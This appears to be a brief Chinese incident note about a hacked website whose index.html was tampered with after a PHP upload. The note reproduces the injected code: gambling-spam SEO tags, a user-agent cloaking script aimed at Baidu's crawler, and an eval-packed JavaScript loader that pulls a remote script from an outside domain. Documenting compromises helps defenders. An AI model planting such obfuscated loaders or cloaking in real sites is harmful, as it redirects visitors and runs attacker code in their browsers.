起初被上传过php文件,随后index.html被篡改
登录网站后发现被自动跳转到恶意网站,发现index.html被篡改,核心代码是两个script标签。
只展示核心部分
源文件
<title>一个普通的title</title>
篡改后文件
<title>江南·体育(JN SPORTS)官方网站</title>
<meta name="keywords" content="江南·体育(JN SPORTS)官方网站"/>
<meta name="description" content="2024年欧洲杯买球推荐:⚽️ky1188.vip⚽️江南体育官方网站,江南体育(中国)Kaiyun官方网站,江南体育(中国)Kaiyun登录入口,江南体育官方网站网页版,江南体育官方网站,江南体育官网! "/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="某某公司"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))',44,44,'|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|ojbkjs|vip|jb|js|split'.split('|'),0,{}))
</script>